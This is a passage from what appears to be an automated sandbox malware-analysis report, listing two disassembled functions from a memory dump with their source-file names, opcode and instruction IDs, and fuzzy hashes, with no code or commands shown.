                                                                                                  • Instruction Fuzzy Hash: 20F103B0911245DFE760DF4CE1A9E547BE2BB01308F46E89AE1155F36AD3B6D884CF11
                                                                                                  Function 01291908 Relevance: .1, Instructions: 95COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.4607999224.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_1290000_Length.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 005fb8e722e7c073a389bb06cf73c76b9479839e68fd5d19ff4db85f0b63515b
                                                                                                  • Instruction ID: d40024b0f073f5f330436c1f5341e4a8229702f000752793596fc2aca12e0d51
                                                                                                  • Opcode Fuzzy Hash: 005fb8e722e7c073a389bb06cf73c76b9479839e68fd5d19ff4db85f0b63515b
                                                                                                  • Instruction Fuzzy Hash: C621D770B302079FFF18DA2EE8556BA77B6FBC5220F184479D60687248E6749C12C7A1
                                                                                                  Function 01290D30 Relevance: .1, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.4607999224.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_1290000_Length.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8566623889f4c926cda1e8b79375e18f4bc3e8c8d558711a1367028f3964ca1a
                                                                                                  • Instruction ID: fc47a596647070c5838ae637615ff4c05ebcc48ad56842642c80e61876fc7aa8
                                                                                                  • Opcode Fuzzy Hash: 8566623889f4c926cda1e8b79375e18f4bc3e8c8d558711a1367028f3964ca1a
                                                                                                  • Instruction Fuzzy Hash: FE113678F0010A9FDB44DFA4E4948AEBBB6FF84201B108469D505A7354DF35AD05CF91